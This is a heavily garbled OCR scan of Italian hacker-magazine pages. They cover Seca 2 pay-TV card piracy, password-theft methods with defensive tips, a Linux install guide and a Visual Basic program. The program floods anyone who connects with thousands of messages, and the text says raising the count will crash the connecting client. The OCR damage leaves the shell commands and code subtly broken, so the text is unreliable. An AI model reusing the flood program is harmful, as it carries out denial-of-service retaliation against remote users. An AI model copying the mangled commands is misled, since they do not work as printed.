sioni accessibili a pa- 
gamento; i commer- 
cianti invece sfruttano 
le conoscenze e il sudo- 
re degli "studiosi" per 
creare un traffico illecito 
di card non autorizzate alla 
visione dei programmi. Gì 
unici ad avere un vero vantaggio 
dalla pirateria sono proprio i commer- 
cianti disonesti, e non tanto gli utenti 
che sborsano grosse somme di denaro 
per una card taroccata che molto spes- 
so smette di funzionare dopo un po' di 
tempo. 

Ovviamente il fenomeno di maggiore 
espansione delle notizie sul sistema di 
codifica firmato Tele+ è Internet: new- 
sgroup, interi siti internet, chat, forum e 
mailing list pullulano di iscritti. 
Sono apparse le "normali" voci di cor- 
ridoio qualche giorno dopo "Scoperto 
Crack per il Seca 2.0", voci che tuttora 
però risultano non confermate. Dall'al- 
tra parte, gruppi di persone costituisco- 
no delle Community "morali" che criti- 
cano gli elevati prezzi della PayTv mila- 
nese e perciò ritengono impossibile 
l'arresto della Pirateria. Dopo il primo 
Boom di notizie si è passati a un perio- 
do di relativa tranquillità nel quale le 
"acque" sembravano essersi calmate. 
A fine luglio però è giunta in Italia una 
nuova sigla: "D2". 



» Che cos'è la D2? 

La D2 è la nuova carta "taroccata", in- 
ventata si pensa dagli spagnoli, per la 
visione dei programmi codificati in Se- 
ca 2. La notizia non è stata conferma- 
ta però questa volta contemporanea- 


mente alle foto della 
nuova card ce ne sono 
altre che testimonie- 
rebbero l'avvenuto 
Crack del nuovo 
sistema. 
Noi non 

ci crediamo, però pensiamo che questa 
volta qualche verità ci sia: un sito in- 
glese che offriva tutte le notizie ineren- 
ti alla nuova scoperta è stato chiuso nel 
giro di 12 ore con una tempestività de- 
gna di nota. Perché gli altri siti che ri- 
portano le "bufale" Seca 2 sono tuttora 
online? 

Questo è il motivo che ci porta a fare 
qualche riflessione non del tutto "posi- 
tiva", anche se è possibile che si tratti 
della solita "bufala internettiana". So- 
lamente il tempo ci svelerà la verità. 


CAM (Conditional Access Modu- 
le): I circuiti che si occupano di de- 
codificare il segnale cifrato. 


Degna di nota è la situazione degli ab- 
bonati a Telepiù. Secondo fonti ufficiose, 
gli aumenti sono stati poco rilevanti e 
dopo anni di sonno indisturbato, qual- 
che dirigente milanese ha detto: "ma 
forse la nostra PayTv è troppo cara?" 
Non tocca certo a me darvi una rispo- 
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questa; tutti i forum e le chat sano affollate di persone "bisognose di 
sapere". Ma in definitiua, che cosa è cambiato realmente? 


sta in merito, comunque in questa era 
del III millennio in cui i cellulari, com- 
puter, videocamere digitali ed ogni 
strumento all'avanguardia sono ormai 
accessibili a tutti o quasi, la televisione 
(Mass-Media più evoluto e potente in 
assoluto poiché in grado di raggiunge- 
re la più grossa fetta di utenza) deve ed 
in futuro dovrà essere presente nelle 


» Ma perche non uedo la 
PPU Palco? 

molteplici forme in tutte le case degli 
italiani. 

Crediamo che chi veramente sia dispo- 
sto a spendere anche 500 Euro da un 
commerciante disonesto per comprarsi 
una carta "taroccata", possa sottoscri- 
vere un abbonamento di circa 40 Euro 
al mese. Questo abbonamento tuttavia 
non permette di vedere nemmeno il 
50% dei programmi offerti la Telepiù 
Digitale, se si escludono gli spettacoli 
Pay Per View. Forse, quindi, il fuoco 


u 


CI (Common Interface): Collega- 
mento per l'aggiunta di espansio- 
ni a un ricevitore sat (per sempio, 
un CAM). 


della incontenibile pirateria italiana è 
alimentato fortemente dagli elevati 
prezzi della PayTv. 

Successivamente all'introduzione della 
nuova smart card con la tecnologia Se- 
ca 2, i ricevitori non marcati "Gold 
Box" dotati di CAM Me- 
diaguard o Astoncrypt 
non possono più accedere 
a Palco attraverso il con- 
sueto servizio telefonico 
IVR. Ecco cosa dice Telepiù 
in proposito: "non è più pos- 
sibile acquistare gli eventi Pay 
Per View (PPV) tramite il ri- 
sponditore automatico, utiliz- 



zando un ricevitore common interface. 
Mentre prima il comando del rispondi- 
tore, di fatto, attivava la visione, ades- 
so abilita la carta ad aprire la visione 
solo su richiesta del cliente. Tale ri- 
chiesta avviene pre- 
mendo il tasto OK 
una volta che appare 
il banner di acqui- 
sto". Benché dispon- 
gano del tasto OK, i 
Common Interface non 
possiedono il sistema 
interattivo Media High- 
way e di conseguenza 
purtroppo non sono in grado di inter 
pretare in modo corretto il comando d 



DVB (Digital Video Broadcasting): 
Lo standard per le trasmissioni di- 
gitali. Non utilizzato negli USA. 


inizio visione. Tali decoder, che non 
hanno mai permesso la visione di Pri- 
mafila Stream, potranno funzionare so- 
lamente per i canali in pay tv, esclusa 


quindi PPV e Televisione Interattiva (ITV), 
e purtroppo nessun aggiornamento 
della CAM potrà colmare questa gran- 
de lacuna sopra espo- 
sta. Tutto questo per- 
ché secondo Telepiù 
Digitale veniva me- 
no il concetto di PPV, 
I visto che non erano 
loro a decidere 
quando vedere l'e- 
vento e poi perché 
l'ordine doveva es- 
sere fatto poco prima della visione. 
Mossa azzeccata? Indubbiamente ades- 
so la PayTv milanese ha un maggiore 
controllo degli apparecchi collegati al 
Seca2 e questo porterà sicuramente dei 
vantaggi alla stabilità della rete. Forse 
però gli abbonati che disponevano del 
decoder Common Interface si sono sen- 
titi traditi da questa drastica scelta e non 
se la sentono di acquistare un nuovo de- 
coder firmato "Gold Box".H 

Francesco Musella 
www.mondosat.net 


...E CI SONO IN GIRO PURE I " TAROCCHI TAROCCATI' 


^^ li utilizzatori pirata rimasti oscu- 
rati dal passaggio a Seca 2 sono 
disposti a pagare cifre molto elevate 
per avere una card taroccata per il 
nuovo sistema. Per questo pare che 
qualcuno abbia avuto un'idea genia- 
le: vendere card originali spaccian- 
dole per "tarocche". Pare che siano 
infatti in circolazione delle schede 
Seca 2 originali (le cosiddette "bian- 
chine"), alle quali però è stato cancel- 
lato, sostituito il logo Telepiù e colo- 
rate di rosso. Vendute a cifre anche 
superiori ai 300 euro, queste schede 
sono sì in grado di funzionare, ma 
solo per alcuni mesi, dopodiché sa- 
ranno disattivate. Per ora l'ipotesi 
più accreditata sulla misteriosa origi- 


ne delle schede rosse è la seguente: 
per poter mantenere il contratto da 
rivenditore autorizzato Telepiù, i ne- 
gozianti devono sottoscrivere un cer- 
to numero di abbonamenti al mese. 
Per non vedersi negare l'autorizza- 
zione, sarebbero in molti quelli che 
alla fine del mese iscrivono persone 
inesistenti, o prese a caso dalla gui- 
da telefonica. Ovviamente questi ab- 
bonamenti sono destinati a scadere, 
perché nessuno effettuerà mai i pa- 
gamenti. Se prima della scadenza il 
negoziante riesce a "piazzare" la 
scheda spacciandola come card pira- 
ta, ovviamente attraverso un inter- 
mediario non rintracciabile, ci po- 
trebbe anche guadagnare un bel po'. 
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COME DIFENDERSI DAI LADRI DI PASSWORD 


Apriti Sesamo! 


"lo per comodità otilizzo la 
stessa password per totti i 
sistemi che oe chiedono ona" 
"Anche io - Uso la tua" 


n passato, quando le uniche co- 
se di valore erano costituite da 
beni materiali, l'intero sistema 
di sicurezza si basava su chiavi, 
serrature, forzieri e casseforti. Oggi accade 
molto frequentemente che i dati e le infor- 
mazioni abbiano un valore molto più 
grande di quello dei beni materiali, e il 
ruolo svolto un tempo dalle chiavi viene af- 
fidato alle password. Le "parole d'ordine" 
addirittura possono anche certificare la no- 
stra identità: chi si appropria delle nostre 
password di accesso può quindi rubarci 
dati preziosi e anche il nostro nome. In 
questo articolo analizzeremo le moda- 
lità di attacco usate per trovare le 
password, in modo da poter prendere 
delle adeguate precauzioni, e tutelare la 
propria riservatezza. 



» Computer al sicuro! 

Supponiamo che un malintenzionato vo- 
glia scovare la nostra password di posta 
elettronica. Perché dovrebbe farlo direte 
voi? Il motivo è molto semplice: esso po- 
trebbe volere accedere a internet senza 
crearsi un account con i suoi dati. Per fare 
ciò utilizzerà un account già esistente (il no- 
stro); così durante la connessione 
sembrerà che siamo stati noi a con- 
netterci, quando invece è stato lui! 
Oppure potrebbe voler leggere tutte le no- 
stre e-mail per carpire informazioni impor- 
tanti, magari da utilizzare a nostro danno 
in un secondo momento. Solitamente, 


l'autenticazione è costituita dall'accoppiate 
nome utente più password, che devono ov- 
viamente combaciare. Il caso della posta 
elettronica è particolare, perché nel 
99,999... % dei casi, il nome utente è 
uguale alla prima parte della nostra e- 
mail, quella prima della @. Ad esempio se 
la nostra e-mail è pecorella@ovile.com, il 
nostro username sarà pecorella. Il malin- 
tenzionato si trova quindi a metà 
strada per trovare l'accoppiata di 
chiavi che gli fornirà l'accesso. 
La password è ovviamente più difficile da 
scoprire, ma forse non così difficile come si 
potrebbe pensare. Se il "malintenzionato" 
avesse libero accesso al nostro Pc (nel sen- 
so che può metterci fisicamente le mani so- 
pra), ha svariati metodi a disposizione per 
rubarci le password. 

Innanzi tutto, potrebbe installare a nostra 
insaputa Key Interceptor, o un altro 
programma simile, che registra tutto 
ciò che si digita con la tastiera (anche 


le password ...) e lo salva in un file. In que- 
sta maniera, leggendo questo file riusci- 
rebbe molto facilmente a leggere la nostra 
password. 

Solitamente, nelle finestre all'interno dei 
programmi, le password vengono nasco- 
ste sotto a pallini o asterischi (****), ma esi- 
stono programmi come Showpassword 
(http://ph1 4.virtualave.net/ show- 
pass.zip) che svelano le password 
nascoste nelle finestre di dialogo. En- 
trando nel nostro programma di posta 
elettronica e leggendo le impostazioni del- 
l'account, lui può leggere il nostro userna- 
me e la nostra password (se abbiamo scel- 
to di registrare la password). 
Se ancora non è contento, potrebbe pre- 
levare tutti i file con estensione *.pwl 
che si trovano nella cartella Ci/Win- 
dows. Questi file contengono svariate 
password del computer in formato cifrato, 
ma si possono facilmente decifrare usando 
uno dei tanti programmi che ci sono sulla 
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rete, come per esempio Win Pass, che lo fa 
automaticamente. Ricordo che tutti i pro- 
grammi che sto citando sono facilmente 
reperibili in rete facendo una semplice ri- 
cerca ad esempio su Google, e quindi so- 
no alla portata di tutti! Qualunque malin- 
tenzionato sarebbe capace di trovarli per 
danneggiarci. 
Se invece il malintenzionato non avesse 


» Niente ingenuità 

libero accesso al nostro computer, ha an- 
cora un bel po' di cartucce da sparare. In 
questo caso, il bersaglio non è tanto il 
computer, quanto la nostra ingenui- 
tà. 

Il malintenzionato potrebbe iscriversi al 
nostro stesso provider e farsi un e-mail ti- 
po amministratore@provider.it, staff-tec- 
nico@provider.it o ancora staff@provi- 
der.it, e mandarci una mail in cui dice 
che per il riordino degli archivi bisogna 
mandare il proprio username e la pas- 
sword. Direte voi ma chi ci casca? Invece, 
anche se è ovvio che il nostro provider 
non ha alcun bisogno di ottenere da noi i 
codici di accesso, sono molti quelli al- 
le prime armi che ci cascano. Quindi 
fate attenzione e non rispondete mai a 
email che vi chiedono di comunicare la 
vostra password. 

Per decifrare i file .pwl, come descritto nel 
paragrafo precedente, non è necessario 
avere accesso fisico al computer. Il ladro 
di password potrebbe infatti farlo a di- 
stanza usando un programma come 
Netbus o altri trojan, che permetto- 
no di scaricare i file .*pwl per poter- 
ci lavorare con calma. Di tutti questi 
metodi inoltre, se il malintenzionato co- 
nosce la vittima, può tentare di fare una 
lista di password possibili, provando con 
il suo nome, quello della sua ragazza, la 
sua squadra del cuore, il suo cantante 
preferito, la sua data di nascita eccetera. 


» La forza bruta 


Ad aggravare le cose, c'è il fatto che alcu- 
ne persone utilizzano la stessa password 
per tutto. In questo caso, individuata una 
password qualunque (come quella dello 


screen saver, o quella di un file di Word), 
il malintenzionato di turno potreb- 
be avere accesso a tutti quanti i ser- 
vizi utilizzati. Se tutti questi attacchi fal- 
lissero, al malintenzionato non resta che 
provare un attacco brute force (forza bru- 
ta). Usando un programma come Brutus, 
potrebbe effettuare migliaia e migliaia di 
tentativi fino a trovare la password giusta. 
I programmi migliori per attacchi a forza 
bruta (o i peggiori, a seconda del punto di 
vista), utilizzano liste di parole che più 
solitamente vengono usate come 
password, le famose wordlist. Scar- 
tate queste parole, i programmi comince- 
ranno a tentare combinazioni casuali di 
lettere e numeri, che però sono decisa- 
mente più difficili da azzeccare. Alla lun- 
ga, un attacco a forza bruta è sempre vin- 
cente, se non viene individuato e fermato 
in tempo utile (magari da parte del provi- 
der). L'unico modo per ritardare il più 
possibile l'individuazione della password 
da parte di un programma a forza bruta, 
è quindi di usare una combinazione ca- 
suale di numeri e lettere maiuscole e mi- 
nuscole; la maggior parte dei sistemi in- 
fatti considera password come "Pippo", 
"pippo" e "pIpPo" differenti tra loro. M 
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Una volta installato, Ghost Keykogger (www.keylogger.net) 
può essere eseguito all'insaputa dell'utente, ed è in grado di 
registrare in un file di testo tutti i tasti premuti, e di spedire 
questo file via email a intervalli predefiniti. 


Dieci regole per stare 
tranquilli 


I Non utilizzate mai il vostro nome, quello del 
J cane o del gatto, quello dei propri gruppi o 

cantanti preferiti o quello della vostra ragazza 

(o del ragazzo). 

Utilizzate sequenze casuali di lettere e nu- 
meri. Se il sistema o il servizio è in grado 

di distinguerle, mischiate lettere maiuscole e 

minuscole. 

Il server del merchant invia il numero di 

!• I*. li» . I 


dell'istituto di credito per una verifica. 

_ Se per sicurezza volete trascriverei la 
password su un foglietto, custoditelo in 
un posto sicuro e chiuso a chiave. Non tenete 
mai il foglio con le password accanto al com- 
puter. 

~ Non utilizzate mai lo stesso criterio per 
- stabilire la password di svariati servizi 
(qualcuno per esempio usa parole composte 
come "serviziolpw", "servizio2pw" e così 


£ Non conservate le password in un file di 
testo che non sia cifrato con un sistema 
robusto (per esempio con Pgp/Gpg). 

" Non rispondete mai a messaggi o telefo- 
, nate che richiedono di comunicare la pas- 
sword, anche se sembrano arrivare dal pro- 
prio provider. 

A Utilizzate un programma che blocchi l'ac- 
cesso al proprio computer quando ci si al- 
lontana (il modo più elementare è quello di im- 
postare una password per il salvaschermo). 

~ Nel caso di password abbinate a schede 
. magnetiche (come quella del bancomat), 
non custodite mai scheda e codice nello stes- 
so posto. 

n Prendete tutte le precauzioni per evitare 
. di installare dei Trojan: non aprite file 
eseguibili sospetti, non lasciate il vostro com- 
puter incustodito, usate un firewall personale 
e un buon antivirus. 
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INSTALLARE PRI6RAMM' "N "MIX 

Con LinuK installare un programma richiede una procedura un po' più compicata del 
semplice doppio clic di un installer per Windows o Mac. Ecco tutto quello che douete 
sapere per regalare nuoui programmi al pinguino che uiue nel uostro computer. 


I programmi per Linux (e 
per Unix in generale) ven- 
gono solitamente distribui- 
ti in due diversi formati: 

' come "sorgenti" e come 

file binari. I sorgenti sono formati 
dal listato vero e proprio del pro- 
gramma, ed è quindi possibile 
aprirli con un editor di testo, leg- 
gerli e modificarli (il bello del soft- 
ware libero è proprio questo). Per 
poter funzionare però, il program- 
ma deve essere "compilato", cioè 
tradotto in istruzioni comprensibili 
per il computer. Questa "traduzio- 
ne" però varia a seconda del siste- 
ma operativo e del processore su 
cui il programma deve funzionare. 
Per questo, mentre un sorgente 
può essere scaricato e compilato su 
qualsiasi combinazione OS/CPU, 
un file binario può essere installa- 
to solo sul computer per il quale è 
stato compilato. 

In questo articolo vedremo come 
installare i programmi distribuiti 
nei due diversi modi, come instal- 
lare le librerie necessarie al loro 
funzionamento e come tenere 
aggiornati i propri programmi. 

» Compilare i sorgenti 

Un programma sotto forma di sor- 
gente viene di solito distribuito 
compresso, e ha estensione .tar.gz, 
.tgz oppure ancora .tar.bz2. Prima- 
di procedere alla compilazione, 
questi faile vanno scompattati in 
questo modo: 

# ed ~/tmp 

# tar xzvf pacchetto . tar . gz 
Se è un archivio . tar.bz2, ci 


vuole un comando un pò più 
complesso : 

# ed ~/tmp 

# cat pacchetto. tar .bz2 | 
bunzip | tar xvf - 

Il risultato di solito < N 

# uno o più file di documen- 
tazione; 

# uno o più script per faci- 
litare 1 ' operazione ; 

# il makefile 

Adesso dovrebbe essersi crea- 
ta la dir "pacch/" entriamoci: 

# ed pacch 

# ls 

I file di documentazione servono 
per riassumere le istruzioni di 
compilazione ed è bene leggerli, 
con questi comandi: 

# less README 

# less INSTALL 

Se i nomi dei file sono diversi da 
quelli elencati, ovviamente biso- 
gnerà usare il nome corretto. 
La composizione di un pacchetto 
sorgente comprende uno script 
che costruisce un makefile adatto 
all'ambiente in cui si vuole compi- 
lare il programma. Questo perchè 
i sistemi UNIX sono spesso e 
volentieri diversi tra loro. 

II makefile è quello che viene letto 
dal comando "make", con lo 
scopo di coordinare le fasi di com- 
pilazione o di installazione di un 
programma già compilato. 
Questo file viene generato solita- 
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mente dallo script "./configure"; 
se questo fiile non fosse presente, 
deve essere controllato o modifi- 
cato manualmente prima della 
compilazione. I pacchetti sorgenti 
di solito si compilano con tre sem- 
plici operazioni: 

# . /configure 
; genera il makefile 

# make 

; esegue la compilazione 
creando i file eseguibili 

# make instali 

/installa gli eseguibili e gli altri file 
del programma (è necessario 
avere accesso come root). 
I problemi maggiori si verificano 
quando non è stato configurato lo 
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«D 


, per cui si e 


ire a mano 


scripf ./coi 

Costretti CI iiiuumvuic u iiiuiiv ii 

makefile, oppure quando il make- 
file non prevede il comando 
"make installa e bisogna quindi 
installare il programma mettendo 
a mano i file giusti al posto giusto. 


» Installare Facci 
già compilati 


Adesso passiamo all'installazione 
di programmi già compilati. 
Innanzitutto dobbiamo prendere 
del software adatto per la nostra 
piattaforma. Il sorgente di uno 
stesso programma può infatti 
dare origine a differenti pacchetti 
compilati a seconda del sistema 
operativo utilizzato e della piatta- 
forma hardware (normalmente 
per i Personal Computer si usa la 
dicitura i386). Un programma in 
formato binario deve essere 
estratto dall'archivio che lo contie- 
ne; fortunatamente, a volte c'è 
uno script che ha proprio questa 
funzione. Altre volte invece biso- 
gna farlo manualmente. 
Quando si può scegliere la desti- 
nazione è bene mettere tutto in 
una cartella, preferibilmente 
discendente da "/opt/" e in certi 
casi bisogna definire alcune 
variabili d'ambiente affinché il 
programma possa funzionare. 
Uno dei casi più comuni è la PATH 
che dovrebbe contenere il percor- 
so necessario ad avviare il pro- 
gramma. Quasi sempre i file di 
documentazione che accompa- 
gnano i programmi elencano tutte 
le variabili necessarie al funzio- 
namento. 

Queste variabili possono essere 
collocate in alcuni file di configu- 
razione della shell utilizzata 
(come /etc/profile/ oppure 
~/.bash_profile), e variano a 
seconda di come è configurato il 
sistema. 

Alcuni programmi usano librerie 
non standard, dette dinamiche, 
che spesso vengono collocate fuori 


dalle directory predisposte per 
contenerle, per renderle disponi- 
bili ci sono 2 modi 

* modificare la configurazio- 
ne di "/etc/ld. so. cache"; 

* utilizzare la variabile di 
ambiente "LD_LIBRARY_PATH" 

Per agire secondo la prima possi- 
bilità bisogna comprendere come 
funziona questo sistema. Il file 
"/etc/ld.so.cache" viene creato a 
partire da "/etc/ld.so.conf", che 
contiene directory destinate a con- 
tenere delle librerie. Il program- 
ma "Idconfig" serve a ricreare 
"/etc/ld.so.cache" in modo da 
mantenerlo aggiornato. 
Occorre quindi aggiungere le 
directory che ci servono al file 
"/etc/ld.so.conf" e poi riawiare 
"Idconfig" 

Per usare invece la variabile di 
sistema "LD_LIBRARY_PATH" pos- 
siamo intervenire attraverso sem- 
plici script, con ciò possiamo fare 
un modo che un solo programma 
veda certe librerie. 
Se vogliamo usare questa variabi- 
le ricordiamoci di includere anche 
i percorsi standard: 

Vlib/" , Vusr/lib/" , 

Vusr/local/lib" . Ecco un esem- 
pio dell'aggiunta di questa 
variabile a "/et c/prof ile" : 

LD_LIBRARY_PATH=/lib : /usr/li 

b : /usr/local/lib : /opt/mio_pr 

og/lib : /opt/altr 

o_prog/lib 

export LD_LIBRARY_PATH 

Se un programma richiede libre- 
rie che possono entrare in conflit- 
to con altri programmi è bene 
configurare questa variabile solo 
per un certo programma, vediamo 
come fare: 

* /bin/sh 

Modifica il percorso di ricerca 
delle librerie: 


programma 


Molto spesso, invece di installare 
completamente la nuova versione 
di un programma, è possibile 
aggiornare la vecchia versione con 
una patch. Se la versione da 
aggiornare si trova nella cartella 
"~/tmp" dobbiamo posizionarci in 
quella stessa cartella e fare: 

# patch < file_da_aggiornare 

L'aggiornamento potrebbe fallire. 
Se vogliamo vedere gli errori com- 
messi basta digitare: 

# patch < file_da_aggiornare 
2> file_degli_errori 

Se gli aggiornamenti sono più di 
uno dobbiamo applicarli in 
sequenza. 


LD_LIBRARY_PATH ="/opt/mio_pro 
gramma/lib:$LD_LIBRARY_PATH" 
export LD_LIBRARY_PATH 

Avvia il programma: 
# mioprogramma 
Avviando lo script viene modifica- 
ta la variabile 
"LD_LIBRARY_PATH" per quel pro- 
cesso e quindi alla fine del proces- 
so termina lo script e tutte le sue 
modifiche. 


Vediamo ora la sintassi del 
comando "Idd". 

# ldd /bin/bash 
; risultato : lbncurses . so . 4 
=> /usr/lib/nbcurses . so. 4 

(0x40000000) 

; e di seguito le altre 
librerie richieste . 

Il risultato in pratica mostra le 
dipendenze dalle librerie di 
"/bin/bash", indica il nome delle 
librerie e il loro posto nel sistema, 
risolvendo anche collegamenti 
inutili, m 
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QUALCUNO BUSSA ALLA VOSTRA PORTA? SBATTETEGLIELA IN FACCIA! 


La miglior difesa è l'attacco 

Un piccalo programma in Uisoal Basic che logga i tentatiui di accesso a uarie porte e 
inuia una "salua di auuertimento" a chi cerca di connettersi. 


Basta aprire un firewall per 
notare che un qualsiasi PC 
collegato a Internet riceve de- 
cine di tentativi di connessione 
e ispezioni che mirano a indi- 
viduare una porta aperta. 
Questo articolo illustrerà come realizzare 
e applicare un servizio che, messo in 
ascolto, potrà darvi la possibilità di 
loggare di chi cerca di connettersi 
alla vostra macchina, avendo in ol- 
tre la possibilità di bloccare il client 
che l'amico fritz sta utilizzando, ma solo 
nel caso in cui avvenga una richiesta di 
connessione con invio di flag TCP "SYN". 
Nella pratica, qualora rilevasse una richie- 
sta di connessione su una deterimanta 
porta selezionata da noi, il servizio invierà 
un flood testuale paralizzando momenta- 
neamente il client, che si troverà a riceve- 
re una grande mole di dati. 


» Il programma 

Questo può essere molto utile per scorag- 
giare eventuali lameroni che decidessero 
di tentare connessioni a porte particolar- 
mente senisbili e che non corrispondono a 
servizi effettivamente attivi. Per esempio, 
chi installa un Web server locale, non ha 
alcun bisogno dei servizi ftp (porta 21) o 
telnet (porta 23), e può quindi "protegger- 
li" con questo programmino. 
Per realizzare questo programma serve 
l'ambiente di sviluppo Visual Basic, in 
versione 5 o 6. Create un nuovo pro- 
gramma exe standard con un form nel 
quale inserirete una TextBox, una ListBox, 


2 CommandButton e il winsock. Per ren- 
dere il tutto meno complicato e quindi 
l'algoritmo più comprensibile, eviteremo 
di inserire istruzioni di debugging come 
GestError e moduli di gestione di control- 
li grafici (Enabled e compagnia). 
I componenti del programma sono: 


- liJrrriiii ii.:-Iiii-iii1iiiIi 


zrmm 



La finestra del programma Listening, 
posto in ascolto sulla porta 23. 1 due 
pulsanti attivano e disattivano il servizio. 


OGGETTO NOME 

- Textbox txtport 

- Commandl cmdascolta 

- Command2 cmddi sconnetti 

- Listi lstlog 

- Winsock ws 

Potete vedere l'intero codice del program- 
ma nel riquadro in questa pagina. Passia- 
mo quindi ad analizzare quello che abbia- 
mo codato, analizzando uno per uno i 
suoi tre eventi: cmdascolta Click (ciò che 


Flood: una grande mole di dati 
inviata a ripetizione verso un 
computer o un programma, 

con l'intento di paralizzarne la 

connessione. 

succede quando facciamo clic sul pulsan- 
te cmdascolta), ws_ConnectionRequest 
(ciò che succede quando riceviamo una ri- 
chiesta di connessione dall'esterno) e 
cmddisconnetti_Click (ciò che succede 
quando facciamo clic sul pulsante cmddi- 
sconnetti). 

1) cmdascolta_Click 

Private Sub cmdascolta_Click () 

ws . LocalPort = txtport . Text 

ws . Listen 

MsgBox "Servizio in ascolto 

sulla porta: " & txtport . Text , 

vb I n f o rma t i on 

End Sub 

Come dicevamo, questo è quanto accade 
quando si fa clic sul CommandButton 
"cmdascolta". Come prima cosa istruiamo 
il nostro ws per impostare come porta lo- 


cale la porta che viene scritta nella txtport 
"txtport.txt < — testo della txtport", gli or- 
diniamo di mettersi in ascolto su quella 
porta e infine di visualizzare una finestra 
msgbox "messaggio" con scritto: 
"Servizio in ascolto sulla porta: " & 

txtport . Text , " 

dove appunto 

"& txtport. Text" 

indica l'immissione nel messaggio del nu- 
mero digitatao nella txtport. 
"Vbinformation" indica il tipo di msgbox, 
nel nostro caso informazione\notifica 

2) ws_ConnectionRequest 

Private Sub ws_ConnectionRe- 
quest (ByVal requestlD As Long) 
If ws. State <> sckClosed Then 
ws.Close 

ws . Accept r eque s t ID 
lstlog. Addltem '"Connessione di 
:" & ws.RemoteHostIP & " sulla 
porta : " & txtport . Text 
For i = 1 To 10000 
ws.SendData "Togliti dai piedi 
lamerone, sei stato loggato — 
> " & ws.RemoteHostIP & vbCrLf 
Next i 
End Sub 

Ora analizziamo invece quanto avviene 
nel caso in cui il nostro servizio riceva 
una richiesta di connessione "ricezione 
flag TCP SYN". Come prima cosa accetta 
la connessione, in seguito aggiunge una 
riga al log "lstlog" inserendo un messag- 
gio del tipo 

"Connessione di : *ip del la- 
man" 

sulla porta : ^scritta nella 
txtport*" 

Dato che ws.remoteHostlp indica Tip dell'- 
host remoto che cerca di connettersi, una 
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Il Flood di dati che investe il malcapitato che ha osato tentare una connessione 
non autorizzata al nostro computer. 


i Loggare: tenere traccia di un 
evento in un registro (il log), soli- 
tamente costituito da un file di te- 
sto. In un tipico log di connessio- 
ni Internet, vengono segnati co- 
me minimo l'indirizzo IP da cui 
proviene la chiamata, la data e 
i'ora della connessione. 

volta accettata la connessione e loggato 
l'indirizzo del lamer si attiva il eliclo di for 
"impostabile", ossia: 

For i = 1 To 10000 
ws.SendData " Togliti dai pie- 
di lamerone, sei stato loggato 


— > & ws .RemoteHostIP « 

vbCrLf 

Next i 

che indica un'invio di diecimila stringhe, 
con il comando 

ws.SendData " Togliti dai pie- 
di lamerone, sei stato loggato 
— > * & ws. RemoteHostIP r 
vbCrLf 

Questa stringa vera visualizzata dal la- 
mer che cerca di connettersi, che leggerà 


il FuckMsg (messaggio di fanculo) con ac- 
canto il suo ip. Il vbCrLf alla fine della 
stringa la manda a capo, facendo in mo- 
do che non si sovrappongano una sull'al- 
tra, ma vengano visualizzate belle leggibi- 
li in colonna, sul client telnet di chi cerca di 
connettersi. Il numero di ripetizioni può 
essere modificato a piacimento. Impo- 
stando un numero molto altro di ri- 
petizioni (come 500000...) si potrà 
impallare il client che "l'utente" sta 
usando per connettersi, costringendo- 
lo quindi a killare il processo. 
Ciò funge anche con client che non visua- 
lizzano i dati ricevuti, come per esempio 
alcuni portscanner, client ftp., o perchè no 
WebCracker e company, i quali andranno 
solo in overflow bloccandosi a causa del- 
l'eccessivo flusso ricevuto dal server (il no- 
stro computer). Se invece non desideria- 
mo esegguire l'attacco, ma solo far visua- 
lizzare a chi si connette il "messaggio di 
benvenuto" e loggarlo, ci basterà elimina- 
re 

il elico di for nel quale è inserita la stringa 
da sendare, ossia eliminare 

For i = 1 to 10000 

e anche Next i 


lasciando quindi solo la stringa da inviare. 
Se invece non desideriamo far visualizzare 
a chi si connette alcun messaggio, optan- 
do quindi solo di loggare il suo \P, dobbia- 
mo eliminare anche 

ws . SendData "Togliti dai piedi 
lamerone, sei stato loggato — 
> " & ws. RemoteHostIP & vbCrLf 

facendo inmodo che il socket ws non invii 
nulla. 

3) cmddi sconnettigliele 

Private Sub 

cmddi sconnettigliele () 

ws .Close 

MsgBox "Sessione terminata", 

vblnformation 

End Sub 

Questo invece è quanto accade cliccando 
sul CommandButton "cmddisconnetti". 
Come prima cosa verrà chiuso il socket, e 
quindi il programma nonsarà più in ascol- 
to. In seguito verrà visualizzata una 
msgbox "messaggio" con scritto "sessione 
terminata", di tipo vbinformationì "infor- 
mazione/notifica". Il programma si con- 
clude qui. Se desiderate avere il program- 
ma in ascolto su più porte diverse, basterà 
impiantare tanti sock quante sono le porte 
da tenere in ascolto... 

endsub 


IL CODICE DEL PROGRAMMA 
LISTENING 

ws.LocalPort = txtport.Text 

ws.Listen 

MsgBox "Servizio in ascolto sulla porta: " & 

txtport.Text, vblnformation 

End Sub 

Private Sub cmddisconnetti_Click() 

ws. Close 

MsgBox "Sessione terminata", 

vblnformation 

End Sub 

Private Sub ws_ConnectionRequest(ByVal 

requestlD As Long) 

If ws. State < > sckCIosed Then ws. Close 

ws.Accept requestlD 

Istlog.Addltem "Connessione di :" & 

ws. RemoteHostIP & " sulla porta :" & 

txtport.Text 

Fori = 1 To 10000 

ws.SendData "Togliti dai piedi lamerone, sei 

stato loggato — > " & ws. RemoteHostIP & 

vbCrLf 

Next i 

End Sub 


www.hackerjournal 


it| 25 


PROGRAMMARE . 


II 


L 

6 

M 

1 

' 

1 

i 

■ 

1 


cosa ce aeniro 
un computer? 

Per tanti il computer è solo una scatola magica in grado di fare 
determinate cose, ma chi uuole sfruttarne al meglio ogni funzione, deue 
cominciare a conoscere meglio il suo funzionamento. 


elio scorso numero abbiamo 
cominciato a parlare del lin- 
guaggio C, e della program- 
^r mozione in generale. Il fun- 

zionamento del C e di tutti i 
linguaggi a lui simili (C + +, ASP,PHR..) 
può, talvolta, essere di difficile compren- 
sione per chi si avvicina alla programma- 
zione per la prima volta. Per gestire bene 
i linguaggi derivati dal C, è necessario co- 
noscere la "macchina", il suo funziona- 
mento a livello fisico e astratto, oltre che 
le sue componenti. 

Questo articolo si propone l'intento di 
spiegare (anche se in maniera poco ap- 
profondita) l'architettura della maggior 
parte degli elaboratori attuali, general- 
mente basati secondo il modello della 
macchina di Von Neumann (ricercatore 
americano di metà '900 che si dedico' al- 
la realizzazione dei primi calcolatori), e di 
chiarire cosa accade quando si esegue un 
programma sul nostro PC. 


di un 


elaboratore 


Le principali componenti della macchina 
di Von Neumann sono: 
-CPU; Central Processing Unit; rappre- 
senta la parte centrale del pc, il cervello 
che estrae ed elabora le informazioni. 
Viene chiamato anche processore; 
-RAM; Random Access Memory; rappre- 
senta la memoria centrale, ovvero la par- 
te di memoria temporanea che la CPU 
utilizza come appoggio per eseguire le 
operazioni. 

-Periferiche I/O; Sono le periferiche di 
